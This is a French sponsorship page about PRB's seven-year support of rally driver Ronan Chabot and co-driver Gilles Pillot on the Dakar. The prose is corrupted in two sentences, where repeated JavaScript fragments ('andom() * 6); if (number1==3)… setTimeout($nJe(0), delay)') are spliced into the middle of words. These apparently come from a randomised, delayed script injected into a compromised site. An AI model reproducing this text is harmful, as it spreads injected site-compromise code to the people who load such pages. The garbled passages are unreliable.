Team Chabot-Pillot

Partenaires

prb

RONAN CHABOT ET PRB, DES LIENS ÉTROITS, DES VALEURS PARTAGÉES

Comme toujours chez PRB, tout commence par une histoire d’hommes. La relation entre Ronan Chabot et Jean-Jacques Laurent, Président du directoire de PRB, ne date en effet pas d’hier.

Ce dernier l’explique : « Quandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and il n’est pas en course sur un rallye, Ronan est concessionnaire. C’est grâce à lui que nous avions conclu un accord de partenariat avec Mercedes France lors du dernier Vendée Globe. Mercedes est d’ailleurs toujours partenaire du bateau ».
Si Ronan apprécie les exploits des marins, il a pourtant une autre passion sportive : il allie son métier de concessionnaire et le rallye automobile. Cette passion l’amène vers des horizons presqu’aussi lointains que les tours du monde puisqu’en janvier prochain, il s’élancera, avec son co-pilote Gilles Pillot, pour son 18ème Dakar au volant d’un Hilux aux couleurs de PRB !
C’est la septième année consécutive que la société vendéenne accompagne Ronan et Gilles dans leur quête de victoire sur le Dakar. Pour PRB, cette aventure sur le plus grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and rallye raid du monde est l’opportunité d’exister sur un autre sport que la voile et lors d’un événement très populaire.